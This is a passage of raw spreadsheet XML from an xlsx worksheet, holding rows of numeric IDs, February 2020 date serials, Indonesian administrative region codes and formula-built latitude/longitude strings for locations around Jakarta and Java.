      <c r="Q1887" t="s">
        <v>6319</v>
      </c>
      <c r="R1887" t="s">
        <v>6320</v>
      </c>
      <c r="S1887" t="s">
        <v>6321</v>
      </c>
      <c r="T1887" t="s">
        <v>1221</v>
      </c>
      <c r="U1887" s="5">
        <v>11271895</v>
      </c>
      <c r="V1887" s="5" t="s">
        <v>16133</v>
      </c>
      <c r="W1887" s="5">
        <v>-820748</v>
      </c>
      <c r="X1887" t="s">
        <v>19890</v>
      </c>
      <c r="Y1887" t="str">
        <f t="shared" si="29"/>
        <v>-8.20748,112.71895</v>
      </c>
    </row>
    <row r="1888" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1888">
        <v>166266</v>
      </c>
      <c r="B1888" s="1">
        <v>43888</v>
      </c>
      <c r="C1888">
        <v>0</v>
      </c>
      <c r="D1888" t="s">
        <v>22</v>
      </c>
      <c r="E1888" t="s">
        <v>23</v>
      </c>
      <c r="F1888" t="s">
        <v>6322</v>
      </c>
      <c r="G1888" t="s">
        <v>6323</v>
      </c>
      <c r="H1888" t="s">
        <v>26</v>
      </c>
      <c r="I1888" t="s">
        <v>6324</v>
      </c>
      <c r="J1888" t="s">
        <v>6325</v>
      </c>
      <c r="L1888" t="s">
        <v>6326</v>
      </c>
      <c r="M1888">
        <v>3172100002</v>
      </c>
      <c r="N1888">
        <v>3172100</v>
      </c>
      <c r="O1888">
        <v>3172</v>
      </c>
      <c r="P1888">
        <v>31</v>
      </c>
      <c r="Q1888" t="s">
        <v>3168</v>
      </c>
      <c r="R1888" t="s">
        <v>1436</v>
      </c>
      <c r="S1888" t="s">
        <v>49</v>
      </c>
      <c r="T1888" t="s">
        <v>33</v>
      </c>
      <c r="U1888" s="5">
        <v>10685978</v>
      </c>
      <c r="V1888" s="5" t="s">
        <v>16134</v>
      </c>
      <c r="W1888" s="5">
        <v>-620079</v>
      </c>
      <c r="X1888" t="s">
        <v>19891</v>
      </c>
      <c r="Y1888" t="str">
        <f t="shared" si="29"/>
        <v>-6.20079,106.85978</v>
      </c>
    </row>
    <row r="1889" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1889">
        <v>166317</v>
      </c>
      <c r="B1889" s="1">
        <v>43888</v>
      </c>
      <c r="C1889">
        <v>0</v>
      </c>
      <c r="D1889" t="s">
        <v>2648</v>
      </c>
      <c r="E1889" t="s">
        <v>23</v>
      </c>
      <c r="G1889" t="s">
        <v>6327</v>
      </c>
      <c r="H1889" t="s">
        <v>26</v>
      </c>
      <c r="I1889" t="s">
        <v>103</v>
      </c>
      <c r="J1889" t="s">
        <v>858</v>
      </c>
      <c r="L1889" t="s">
        <v>6328</v>
      </c>
      <c r="M1889">
        <v>3175010003</v>
      </c>
      <c r="N1889">
        <v>3175010</v>
      </c>
      <c r="O1889">
        <v>3175</v>
      </c>
      <c r="P1889">
        <v>31</v>
      </c>
      <c r="Q1889" t="s">
        <v>545</v>
      </c>
      <c r="R1889" t="s">
        <v>546</v>
      </c>
      <c r="S1889" t="s">
        <v>547</v>
      </c>
      <c r="T1889" t="s">
        <v>33</v>
      </c>
      <c r="U1889" s="5">
        <v>10677744</v>
      </c>
      <c r="V1889" s="5" t="s">
        <v>16135</v>
      </c>
      <c r="W1889" s="5">
        <v>-612857</v>
      </c>
      <c r="X1889" t="s">
        <v>19892</v>
      </c>
      <c r="Y1889" t="str">
        <f t="shared" si="29"/>
        <v>-6.12857,106.77744</v>
      </c>
    </row>
    <row r="1890" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1890">
        <v>166347</v>
      </c>
      <c r="B1890" s="1">
        <v>43888</v>
      </c>
      <c r="C1890">
        <v>0</v>
      </c>
      <c r="D1890" t="s">
        <v>2648</v>
      </c>
      <c r="E1890" t="s">
        <v>23</v>
      </c>
      <c r="G1890" t="s">
        <v>6329</v>
      </c>
      <c r="H1890" t="s">
        <v>26</v>
      </c>
      <c r="I1890" t="s">
        <v>103</v>
      </c>
      <c r="J1890" t="s">
        <v>2676</v>
      </c>
      <c r="L1890" t="s">
        <v>6330</v>
      </c>
      <c r="M1890">
        <v>3174080005</v>
      </c>
      <c r="N1890">
        <v>3174080</v>
      </c>
      <c r="O1890">
        <v>3174</v>
      </c>
      <c r="P1890">
        <v>31</v>
      </c>
      <c r="Q1890" t="s">
        <v>2663</v>
      </c>
      <c r="R1890" t="s">
        <v>695</v>
      </c>
      <c r="S1890" t="s">
        <v>32</v>
      </c>
      <c r="T1890" t="s">
        <v>33</v>
      </c>
      <c r="U1890" s="5">
        <v>10670013</v>
      </c>
      <c r="V1890" s="5" t="s">
        <v>16136</v>
      </c>
      <c r="W1890" s="5">
        <v>-609738</v>
      </c>
      <c r="X1890" t="s">
        <v>19893</v>
      </c>
      <c r="Y1890" t="str">
        <f t="shared" si="29"/>
        <v>-6.09738,106.70013</v>
      </c>
    </row>
    <row r="1891" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1891">
        <v>166351</v>
      </c>
      <c r="B1891" s="1">
        <v>43888</v>
      </c>
      <c r="C1891">
        <v>0</v>
      </c>
      <c r="D1891" t="s">
        <v>2648</v>
      </c>
      <c r="E1891" t="s">
        <v>23</v>
      </c>
      <c r="G1891" t="s">
        <v>6331</v>
      </c>
      <c r="H1891" t="s">
        <v>26</v>
      </c>
      <c r="I1891" t="s">
        <v>710</v>
      </c>
      <c r="J1891" t="s">
        <v>667</v>
      </c>
      <c r="L1891" t="s">
        <v>6332</v>
      </c>
      <c r="M1891">
        <v>3175010003</v>
      </c>
      <c r="N1891">
        <v>3175010</v>
      </c>
      <c r="O1891">
        <v>3175</v>
      </c>
      <c r="P1891">
        <v>31</v>
      </c>
      <c r="Q1891" t="s">
        <v>545</v>
      </c>
      <c r="R1891" t="s">
        <v>546</v>
      </c>
      <c r="S1891" t="s">
        <v>547</v>
      </c>
      <c r="T1891" t="s">
        <v>33</v>
      </c>
      <c r="U1891" s="5">
        <v>10678031</v>
      </c>
      <c r="V1891" s="5" t="s">
        <v>15773</v>
      </c>
      <c r="W1891" s="5">
        <v>-613227</v>
      </c>
      <c r="X1891" t="s">
        <v>19894</v>
      </c>
      <c r="Y1891" t="str">
        <f t="shared" si="29"/>
        <v>-6.13227,106.78031</v>
      </c>
    </row>
    <row r="1892" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1892">
        <v>166369</v>
      </c>
      <c r="B1892" s="1">
        <v>43888</v>
      </c>
      <c r="C1892">
        <v>0</v>
      </c>
      <c r="D1892" t="s">
        <v>22</v>
      </c>
      <c r="E1892" t="s">
        <v>23</v>
      </c>
      <c r="F1892" t="s">
        <v>6333</v>
      </c>
      <c r="G1892" t="s">
        <v>6334</v>
      </c>
      <c r="H1892" t="s">
        <v>26</v>
      </c>
      <c r="I1892" t="s">
        <v>1542</v>
      </c>
      <c r="J1892" t="s">
        <v>2608</v>
      </c>
      <c r="L1892" t="s">
        <v>6335</v>
      </c>
      <c r="M1892">
        <v>3375010012</v>
      </c>
      <c r="N1892">
        <v>3375010</v>
      </c>
      <c r="O1892">
        <v>3375</v>
      </c>
      <c r="P1892">
        <v>33</v>
      </c>
      <c r="Q1892" t="s">
        <v>6336</v>
      </c>
      <c r="R1892" t="s">
        <v>6337</v>
      </c>
      <c r="S1892" t="s">
        <v>6246</v>
      </c>
      <c r="T1892" t="s">
        <v>1134</v>
      </c>
      <c r="U1892" s="5">
        <v>10966018</v>
      </c>
      <c r="V1892" s="5" t="s">
        <v>16137</v>
      </c>
      <c r="W1892" s="5">
        <v>-688682</v>
      </c>
      <c r="X1892" t="s">
        <v>19895</v>
      </c>
      <c r="Y1892" t="str">
        <f t="shared" si="29"/>
        <v>-6.88682,109.66018</v>
      </c>
    </row>
    <row r="1893" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1893">
        <v>166412</v>
      </c>
      <c r="B1893" s="1">
        <v>43888</v>
      </c>
      <c r="C1893">
        <v>0</v>
      </c>
      <c r="D1893" t="s">
        <v>2648</v>
      </c>
      <c r="E1893" t="s">
        <v>23</v>
      </c>
      <c r="G1893" t="s">
        <v>6338</v>
      </c>
      <c r="H1893" t="s">
        <v>26</v>
      </c>
      <c r="I1893" t="s">
        <v>710</v>
      </c>
      <c r="J1893" t="s">
        <v>2676</v>
      </c>
      <c r="L1893" t="s">
        <v>6339</v>
      </c>
      <c r="M1893">
        <v>3174080005</v>
      </c>
      <c r="N1893">
        <v>3174080</v>
      </c>
      <c r="O1893">
        <v>3174</v>
      </c>
      <c r="P1893">
        <v>31</v>
      </c>
      <c r="Q1893" t="s">
        <v>2663</v>
      </c>
      <c r="R1893" t="s">
        <v>695</v>
      </c>
      <c r="S1893" t="s">
        <v>32</v>
      </c>
      <c r="T1893" t="s">
        <v>33</v>
      </c>
      <c r="U1893" s="5">
        <v>10670007</v>
      </c>
      <c r="V1893" s="5" t="s">
        <v>16138</v>
      </c>
      <c r="W1893" s="5">
        <v>-609694</v>
      </c>
      <c r="X1893" t="s">
        <v>19896</v>
      </c>
      <c r="Y1893" t="str">
        <f t="shared" si="29"/>
        <v>-6.09694,106.70007</v>
      </c>
    </row>
    <row r="1894" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1894">
        <v>166456</v>
      </c>
      <c r="B1894" s="1">
        <v>43888</v>
      </c>
      <c r="C1894">
        <v>0</v>
      </c>
      <c r="D1894" t="s">
        <v>22</v>
      </c>
      <c r="E1894" t="s">
        <v>23</v>
      </c>
      <c r="F1894" t="s">
        <v>6340</v>
      </c>
      <c r="H1894" t="s">
        <v>26</v>
      </c>
      <c r="I1894" t="s">
        <v>1433</v>
      </c>
      <c r="J1894" t="s">
        <v>3135</v>
      </c>
      <c r="L1894" t="s">
        <v>6341</v>
      </c>
      <c r="M1894">
        <v>3671042004</v>
      </c>
      <c r="N1894">
        <v>3671042</v>
      </c>
      <c r="O1894">
        <v>3671</v>
      </c>
      <c r="P1894">
        <v>36</v>
      </c>
      <c r="Q1894" t="s">
        <v>2102</v>
      </c>
      <c r="R1894" t="s">
        <v>2102</v>
      </c>
      <c r="S1894" t="s">
        <v>201</v>
      </c>
      <c r="T1894" t="s">
        <v>171</v>
      </c>
      <c r="U1894" s="5">
        <v>10659228</v>
      </c>
      <c r="V1894" s="5" t="s">
        <v>16139</v>
      </c>
      <c r="W1894" s="5">
        <v>-616223</v>
      </c>
      <c r="X1894" t="s">
        <v>19897</v>
      </c>
      <c r="Y1894" t="str">
        <f t="shared" si="29"/>
        <v>-6.16223,106.59228</v>
      </c>
    </row>
    <row r="1895" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1895">
        <v>166944</v>
      </c>
      <c r="B1895" s="1">
        <v>43888</v>
      </c>
      <c r="C1895">
        <v>0</v>
      </c>
      <c r="D1895" t="s">
        <v>22</v>
      </c>
      <c r="E1895" t="s">
        <v>23</v>
      </c>
      <c r="F1895" t="s">
        <v>6342</v>
      </c>
      <c r="H1895" t="s">
        <v>26</v>
      </c>
      <c r="I1895" t="s">
        <v>1447</v>
      </c>
      <c r="J1895" t="s">
        <v>2627</v>
      </c>
      <c r="L1895" t="s">
        <v>6343</v>
      </c>
      <c r="M1895">
        <v>3216071006</v>
      </c>
      <c r="N1895">
        <v>3216071</v>
      </c>
      <c r="O1895">
        <v>3216</v>
      </c>
      <c r="P1895">
        <v>32</v>
      </c>
      <c r="Q1895" t="s">
        <v>6344</v>
      </c>
      <c r="R1895" t="s">
        <v>2013</v>
      </c>
      <c r="S1895" t="s">
        <v>41</v>
      </c>
      <c r="T1895" t="s">
        <v>42</v>
      </c>
      <c r="U1895" s="5">
        <v>10710402</v>
      </c>
      <c r="V1895" s="5" t="s">
        <v>16140</v>
      </c>
      <c r="W1895" s="5">
        <v>-629706</v>
      </c>
      <c r="X1895" t="s">
        <v>19898</v>
      </c>
      <c r="Y1895" t="str">
        <f t="shared" si="29"/>
        <v>-6.29706,107.10402</v>
      </c>
    </row>
    <row r="1896" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1896">
        <v>167230</v>
      </c>
      <c r="B1896" s="1">
        <v>43888</v>
      </c>
      <c r="C1896">
        <v>0</v>
      </c>
      <c r="D1896" t="s">
        <v>2648</v>
      </c>
      <c r="E1896" t="s">
        <v>23</v>
      </c>
      <c r="G1896" t="s">
        <v>6345</v>
      </c>
      <c r="H1896" t="s">
        <v>26</v>
      </c>
      <c r="I1896" t="s">
        <v>6346</v>
      </c>
      <c r="J1896" t="s">
        <v>1715</v>
      </c>
      <c r="L1896" t="s">
        <v>6347</v>
      </c>
      <c r="M1896">
        <v>3175010005</v>
      </c>
      <c r="N1896">
        <v>3175010</v>
      </c>
      <c r="O1896">
        <v>3175</v>
      </c>
      <c r="P1896">
        <v>31</v>
      </c>
      <c r="Q1896" t="s">
        <v>1686</v>
      </c>
      <c r="R1896" t="s">
        <v>546</v>
      </c>
      <c r="S1896" t="s">
        <v>547</v>
      </c>
      <c r="T1896" t="s">
        <v>33</v>
      </c>
      <c r="U1896" s="5">
        <v>10676884</v>
      </c>
      <c r="V1896" s="5" t="s">
        <v>16141</v>
      </c>
      <c r="W1896" s="5">
        <v>-610772</v>
      </c>
      <c r="X1896" t="s">
        <v>19899</v>
      </c>
      <c r="Y1896" t="str">
        <f t="shared" si="29"/>
        <v>-6.10772,106.76884</v>
      </c>
    </row>
    <row r="1897" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1897">
        <v>167385</v>
      </c>
      <c r="B1897" s="1">
        <v>43888</v>
      </c>
      <c r="C1897">
        <v>0</v>
      </c>
      <c r="D1897" t="s">
        <v>2648</v>
      </c>
      <c r="E1897" t="s">
        <v>23</v>
      </c>
      <c r="G1897" t="s">
        <v>6348</v>
      </c>
      <c r="H1897" t="s">
        <v>26</v>
      </c>
      <c r="J1897" t="s">
        <v>858</v>
      </c>
      <c r="L1897" t="s">
        <v>6349</v>
      </c>
      <c r="M1897">
        <v>3175010003</v>
      </c>
      <c r="N1897">
        <v>3175010</v>
      </c>
      <c r="O1897">
        <v>3175</v>
      </c>
      <c r="P1897">
        <v>31</v>
      </c>
      <c r="Q1897" t="s">
        <v>545</v>
      </c>
      <c r="R1897" t="s">
        <v>546</v>
      </c>
      <c r="S1897" t="s">
        <v>547</v>
      </c>
      <c r="T1897" t="s">
        <v>33</v>
      </c>
      <c r="U1897" s="5">
        <v>10677744</v>
      </c>
      <c r="V1897" s="5" t="s">
        <v>16135</v>
      </c>
      <c r="W1897" s="5">
        <v>-612879</v>
      </c>
      <c r="X1897" t="s">
        <v>19900</v>
      </c>
      <c r="Y1897" t="str">
        <f t="shared" si="29"/>
        <v>-6.12879,106.77744</v>
      </c>
    </row>
    <row r="1898" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1898">
        <v>167391</v>
      </c>
      <c r="B1898" s="1">
        <v>43888</v>
      </c>
      <c r="C1898">
        <v>0</v>
      </c>
      <c r="D1898" t="s">
        <v>2648</v>
      </c>
      <c r="E1898" t="s">
        <v>23</v>
      </c>
      <c r="G1898" t="s">
        <v>6350</v>
      </c>
      <c r="H1898" t="s">
        <v>26</v>
      </c>
      <c r="J1898" t="s">
        <v>858</v>
      </c>
      <c r="L1898" t="s">
        <v>6351</v>
      </c>
      <c r="M1898">
        <v>3175010003</v>
      </c>
      <c r="N1898">
        <v>3175010</v>
      </c>
      <c r="O1898">
        <v>3175</v>
      </c>
      <c r="P1898">
        <v>31</v>
      </c>
      <c r="Q1898" t="s">
        <v>545</v>
      </c>
      <c r="R1898" t="s">
        <v>546</v>
      </c>
      <c r="S1898" t="s">
        <v>547</v>
      </c>
      <c r="T1898" t="s">
        <v>33</v>
      </c>
      <c r="U1898" s="5">
        <v>10677665</v>
      </c>
      <c r="V1898" s="5" t="s">
        <v>16142</v>
      </c>
      <c r="W1898" s="5">
        <v>-612938</v>
      </c>
      <c r="X1898" t="s">
        <v>19901</v>
      </c>
      <c r="Y1898" t="str">
        <f t="shared" si="29"/>
        <v>-6.12938,106.77665</v>
      </c>
    </row>
    <row r="1899" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1899">
        <v>168143</v>
      </c>
      <c r="B1899" s="1">
        <v>43888</v>
      </c>
      <c r="C1899">
        <v>1</v>
      </c>
      <c r="D1899" t="s">
        <v>22</v>
      </c>
      <c r="E1899" t="s">
        <v>23</v>
      </c>
      <c r="F1899" t="s">
        <v>6352</v>
      </c>
      <c r="H1899" t="s">
        <v>26</v>
      </c>
      <c r="I1899" t="s">
        <v>6353</v>
      </c>
      <c r="J1899" t="s">
        <v>6354</v>
      </c>
      <c r="L1899" t="s">
        <v>6355</v>
      </c>
      <c r="M1899">
        <v>3172040002</v>
      </c>
      <c r="N1899">
        <v>3172040</v>
      </c>
      <c r="O1899">
        <v>3172</v>
      </c>
      <c r="P1899">
        <v>31</v>
      </c>
      <c r="Q1899" t="s">
        <v>281</v>
      </c>
      <c r="R1899" t="s">
        <v>281</v>
      </c>
      <c r="S1899" t="s">
        <v>49</v>
      </c>
      <c r="T1899" t="s">
        <v>33</v>
      </c>
      <c r="U1899" s="5">
        <v>10688191</v>
      </c>
      <c r="V1899" s="5" t="s">
        <v>16143</v>
      </c>
      <c r="W1899" s="5">
        <v>-627356</v>
      </c>
      <c r="X1899" t="s">
        <v>19902</v>
      </c>
      <c r="Y1899" t="str">
        <f t="shared" si="29"/>
        <v>-6.27356,106.88191</v>
      </c>
    </row>
    <row r="1900" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1900">
        <v>168312</v>
      </c>
      <c r="B1900" s="1">
        <v>43888</v>
      </c>
      <c r="C1900">
        <v>1</v>
      </c>
      <c r="D1900" t="s">
        <v>22</v>
      </c>
      <c r="E1900" t="s">
        <v>23</v>
      </c>
      <c r="F1900" t="s">
        <v>6356</v>
      </c>
      <c r="H1900" t="s">
        <v>26</v>
      </c>
      <c r="I1900" t="s">
        <v>511</v>
      </c>
      <c r="J1900" t="s">
        <v>3244</v>
      </c>
      <c r="L1900" t="s">
        <v>6357</v>
      </c>
      <c r="M1900">
        <v>3171100003</v>
      </c>
      <c r="N1900">
        <v>3171100</v>
      </c>
      <c r="O1900">
        <v>3171</v>
      </c>
      <c r="P1900">
        <v>31</v>
      </c>
      <c r="Q1900" t="s">
        <v>3246</v>
      </c>
      <c r="R1900" t="s">
        <v>107</v>
      </c>
      <c r="S1900" t="s">
        <v>108</v>
      </c>
      <c r="T1900" t="s">
        <v>33</v>
      </c>
      <c r="U1900" s="5">
        <v>10682378</v>
      </c>
      <c r="V1900" s="5" t="s">
        <v>16144</v>
      </c>
      <c r="W1900" s="5">
        <v>-621833</v>
      </c>
      <c r="X1900" t="s">
        <v>19903</v>
      </c>
      <c r="Y1900" t="str">
        <f t="shared" si="29"/>
        <v>-6.21833,106.82378</v>
      </c>
    </row>
    <row r="1901" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1901">
        <v>168404</v>
      </c>
      <c r="B1901" s="1">
        <v>43888</v>
      </c>
      <c r="C1901">
        <v>1</v>
      </c>
      <c r="D1901" t="s">
        <v>2648</v>
      </c>
      <c r="E1901" t="s">
        <v>23</v>
      </c>
      <c r="G1901" t="s">
        <v>6358</v>
      </c>
      <c r="H1901" t="s">
        <v>26</v>
      </c>
      <c r="J1901" t="s">
        <v>1560</v>
      </c>
      <c r="L1901" t="s">
        <v>6359</v>
      </c>
      <c r="M1901">
        <v>3175030007</v>
      </c>
      <c r="N1901">
        <v>3175030</v>
      </c>
      <c r="O1901">
        <v>3175</v>
      </c>
      <c r="P1901">
        <v>31</v>
      </c>
      <c r="Q1901" t="s">
        <v>1562</v>
      </c>
      <c r="R1901" t="s">
        <v>1563</v>
      </c>
      <c r="S1901" t="s">
        <v>547</v>
      </c>
      <c r="T1901" t="s">
        <v>33</v>
      </c>
      <c r="U1901" s="5">
        <v>10687585</v>
      </c>
      <c r="V1901" s="5" t="s">
        <v>15067</v>
      </c>
      <c r="W1901" s="5">
        <v>-611554</v>
      </c>
      <c r="X1901" t="s">
        <v>19904</v>
      </c>
      <c r="Y1901" t="str">
        <f t="shared" si="29"/>
        <v>-6.11554,106.87585</v>
      </c>
    </row>
    <row r="1902" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1902">
        <v>168669</v>
      </c>
      <c r="B1902" s="1">
        <v>43888</v>
      </c>
      <c r="C1902">
        <v>1</v>
      </c>
      <c r="D1902" t="s">
        <v>2648</v>
      </c>
      <c r="E1902" t="s">
        <v>23</v>
      </c>
      <c r="G1902" t="s">
        <v>6360</v>
      </c>
      <c r="H1902" t="s">
        <v>26</v>
      </c>
      <c r="J1902" t="s">
        <v>6361</v>
      </c>
      <c r="L1902" t="s">
        <v>6362</v>
      </c>
      <c r="M1902">
        <v>3173060006</v>
      </c>
      <c r="N1902">
        <v>3173060</v>
      </c>
      <c r="O1902">
        <v>3173</v>
      </c>
      <c r="P1902">
        <v>31</v>
      </c>
      <c r="Q1902" t="s">
        <v>1587</v>
      </c>
      <c r="R1902" t="s">
        <v>61</v>
      </c>
      <c r="S1902" t="s">
        <v>62</v>
      </c>
      <c r="T1902" t="s">
        <v>33</v>
      </c>
      <c r="U1902" s="5">
        <v>10685473</v>
      </c>
      <c r="V1902" s="5" t="s">
        <v>16145</v>
      </c>
      <c r="W1902" s="5">
        <v>-615533</v>
      </c>
      <c r="X1902" t="s">
        <v>19905</v>
      </c>
      <c r="Y1902" t="str">
        <f t="shared" si="29"/>
        <v>-6.15533,106.85473</v>
      </c>
    </row>
    <row r="1903" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1903">
        <v>168903</v>
      </c>
      <c r="B1903" s="1">
        <v>43889</v>
      </c>
      <c r="C1903">
        <v>0</v>
      </c>
      <c r="D1903" t="s">
        <v>2648</v>
      </c>
      <c r="E1903" t="s">
        <v>23</v>
      </c>
      <c r="G1903" t="s">
        <v>6363</v>
      </c>
      <c r="H1903" t="s">
        <v>26</v>
      </c>
      <c r="J1903" t="s">
        <v>667</v>
      </c>
      <c r="L1903" t="s">
        <v>6364</v>
      </c>
      <c r="M1903">
        <v>3175010003</v>
      </c>
      <c r="N1903">
        <v>3175010</v>
      </c>
      <c r="O1903">
        <v>3175</v>
      </c>
      <c r="P1903">
        <v>31</v>
      </c>
      <c r="Q1903" t="s">
        <v>545</v>
      </c>
      <c r="R1903" t="s">
        <v>546</v>
      </c>
      <c r="S1903" t="s">
        <v>547</v>
      </c>
      <c r="T1903" t="s">
        <v>33</v>
      </c>
      <c r="U1903" s="5">
        <v>10677821</v>
      </c>
      <c r="V1903" s="5" t="s">
        <v>16146</v>
      </c>
      <c r="W1903" s="5">
        <v>-613237</v>
      </c>
      <c r="X1903" t="s">
        <v>19906</v>
      </c>
      <c r="Y1903" t="str">
        <f t="shared" si="29"/>
        <v>-6.13237,106.77821</v>
      </c>
    </row>
    <row r="1904" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1904">
        <v>169297</v>
      </c>
      <c r="B1904" s="1">
        <v>43889</v>
      </c>
      <c r="C1904">
        <v>0</v>
      </c>
      <c r="D1904" t="s">
        <v>2648</v>
      </c>
      <c r="E1904" t="s">
        <v>23</v>
      </c>
      <c r="G1904" t="s">
        <v>6365</v>
      </c>
      <c r="H1904" t="s">
        <v>26</v>
      </c>
      <c r="I1904" t="s">
        <v>1059</v>
      </c>
      <c r="J1904" t="s">
        <v>5647</v>
      </c>
      <c r="L1904" t="s">
        <v>6366</v>
      </c>
      <c r="M1904">
        <v>3171020006</v>
      </c>
      <c r="N1904">
        <v>3171020</v>
      </c>
      <c r="O1904">
        <v>3171</v>
      </c>
      <c r="P1904">
        <v>31</v>
      </c>
      <c r="Q1904" t="s">
        <v>499</v>
      </c>
      <c r="R1904" t="s">
        <v>484</v>
      </c>
      <c r="S1904" t="s">
        <v>108</v>
      </c>
      <c r="T1904" t="s">
        <v>33</v>
      </c>
      <c r="U1904" s="5">
        <v>10683489</v>
      </c>
      <c r="V1904" s="5" t="s">
        <v>16147</v>
      </c>
      <c r="W1904" s="5">
        <v>-627550</v>
      </c>
      <c r="X1904" t="s">
        <v>19907</v>
      </c>
      <c r="Y1904" t="str">
        <f t="shared" si="29"/>
        <v>-6.27550,106.83489</v>
      </c>
    </row>
    <row r="1905" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1905">
        <v>169514</v>
      </c>
      <c r="B1905" s="1">
        <v>43889</v>
      </c>
      <c r="C1905">
        <v>0</v>
      </c>
      <c r="D1905" t="s">
        <v>2648</v>
      </c>
      <c r="E1905" t="s">
        <v>23</v>
      </c>
      <c r="G1905" t="s">
        <v>6367</v>
      </c>
      <c r="H1905" t="s">
        <v>26</v>
      </c>
      <c r="I1905" t="s">
        <v>103</v>
      </c>
      <c r="J1905" t="s">
        <v>5962</v>
      </c>
      <c r="L1905" t="s">
        <v>6368</v>
      </c>
      <c r="M1905">
        <v>3175060005</v>
      </c>
      <c r="N1905">
        <v>3175060</v>
      </c>
      <c r="O1905">
        <v>3175</v>
      </c>
      <c r="P1905">
        <v>31</v>
      </c>
      <c r="Q1905" t="s">
        <v>5964</v>
      </c>
      <c r="R1905" t="s">
        <v>2279</v>
      </c>
      <c r="S1905" t="s">
        <v>547</v>
      </c>
      <c r="T1905" t="s">
        <v>33</v>
      </c>
      <c r="U1905" s="5">
        <v>10693642</v>
      </c>
      <c r="V1905" s="5" t="s">
        <v>16148</v>
      </c>
      <c r="W1905" s="5">
        <v>-613533</v>
      </c>
      <c r="X1905" t="s">
        <v>19908</v>
      </c>
      <c r="Y1905" t="str">
        <f t="shared" si="29"/>
        <v>-6.13533,106.93642</v>
      </c>
    </row>
    <row r="1906" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1906">
        <v>169752</v>
      </c>
      <c r="B1906" s="1">
        <v>43889</v>
      </c>
      <c r="C1906">
        <v>0</v>
      </c>
      <c r="D1906" t="s">
        <v>22</v>
      </c>
      <c r="E1906" t="s">
        <v>23</v>
      </c>
      <c r="F1906" t="s">
        <v>6369</v>
      </c>
      <c r="G1906" t="s">
        <v>6370</v>
      </c>
      <c r="H1906" t="s">
        <v>26</v>
      </c>
      <c r="I1906" t="s">
        <v>332</v>
      </c>
      <c r="J1906" t="s">
        <v>5030</v>
      </c>
      <c r="L1906" t="s">
        <v>6371</v>
      </c>
      <c r="M1906">
        <v>3172030004</v>
      </c>
      <c r="N1906">
        <v>3172030</v>
      </c>
      <c r="O1906">
        <v>3172</v>
      </c>
      <c r="P1906">
        <v>31</v>
      </c>
      <c r="Q1906" t="s">
        <v>228</v>
      </c>
      <c r="R1906" t="s">
        <v>228</v>
      </c>
      <c r="S1906" t="s">
        <v>49</v>
      </c>
      <c r="T1906" t="s">
        <v>33</v>
      </c>
      <c r="U1906" s="5">
        <v>10689432</v>
      </c>
      <c r="V1906" s="5" t="s">
        <v>16149</v>
      </c>
      <c r="W1906" s="5">
        <v>-632675</v>
      </c>
      <c r="X1906" t="s">
        <v>19909</v>
      </c>
      <c r="Y1906" t="str">
        <f t="shared" si="29"/>
        <v>-6.32675,106.89432</v>
      </c>
    </row>
    <row r="1907" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1907">
        <v>169826</v>
      </c>
      <c r="B1907" s="1">
        <v>43889</v>
      </c>
      <c r="C1907">
        <v>0</v>
      </c>
      <c r="D1907" t="s">
        <v>2648</v>
      </c>
      <c r="E1907" t="s">
        <v>23</v>
      </c>
      <c r="G1907" t="s">
        <v>6372</v>
      </c>
      <c r="H1907" t="s">
        <v>26</v>
      </c>
      <c r="I1907" t="s">
        <v>103</v>
      </c>
      <c r="J1907" t="s">
        <v>814</v>
      </c>
      <c r="L1907" t="s">
        <v>6373</v>
      </c>
      <c r="M1907">
        <v>3172060007</v>
      </c>
      <c r="N1907">
        <v>3172060</v>
      </c>
      <c r="O1907">
        <v>3172</v>
      </c>
      <c r="P1907">
        <v>31</v>
      </c>
      <c r="Q1907" t="s">
        <v>817</v>
      </c>
      <c r="R1907" t="s">
        <v>48</v>
      </c>
      <c r="S1907" t="s">
        <v>49</v>
      </c>
      <c r="T1907" t="s">
        <v>33</v>
      </c>
      <c r="U1907" s="5">
        <v>10686328</v>
      </c>
      <c r="V1907" s="5" t="s">
        <v>16150</v>
      </c>
      <c r="W1907" s="5">
        <v>-621511</v>
      </c>
      <c r="X1907" t="s">
        <v>19910</v>
      </c>
      <c r="Y1907" t="str">
        <f t="shared" si="29"/>
        <v>-6.21511,106.86328</v>
      </c>
    </row>
    <row r="1908" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A1908">
        <v>169875</v>
      </c>
      <c r="B1908" s="1">
        <v>43889</v>
      </c>
      <c r="C1908">
        <v>0</v>
      </c>
      <c r="D1908" t="s">
        <v>85</v>
      </c>
      <c r="E1908" t="s">
        <v>23</v>
      </c>
      <c r="F1908" t="s">
        <v>6374</v>
      </c>
      <c r="G1908" t="s">
        <v>6375</v>
      </c>
      <c r="H1908" t="s">
        <v>26</v>
      </c>
      <c r="J1908" t="s">
        <v>2627</v>
      </c>
      <c r="K1908" t="s">
        <v>6376</v>
      </c>
      <c r="L1908" t="s">
        <v>6377</v>
      </c>
      <c r="M1908">
        <v>3211010006</v>
      </c>
      <c r="N1908">
        <v>3211010</v>
      </c>
      <c r="O1908">
        <v>3211</v>
      </c>
      <c r="P1908">
        <v>32</v>
      </c>
      <c r="Q1908" t="s">
        <v>6378</v>
      </c>
      <c r="R1908" t="s">
        <v>2952</v>
      </c>
      <c r="S1908" t="s">
        <v>1797</v>
      </c>
      <c r="T1908" t="s">
        <v>42</v>
      </c>
      <c r="U1908" s="5">
        <v>10778712</v>
      </c>
      <c r="V1908" s="5" t="s">
        <v>16151</v>
      </c>
      <c r="W1908" s="5">
        <v>-694862</v>
      </c>
      <c r="X1908" t="s">
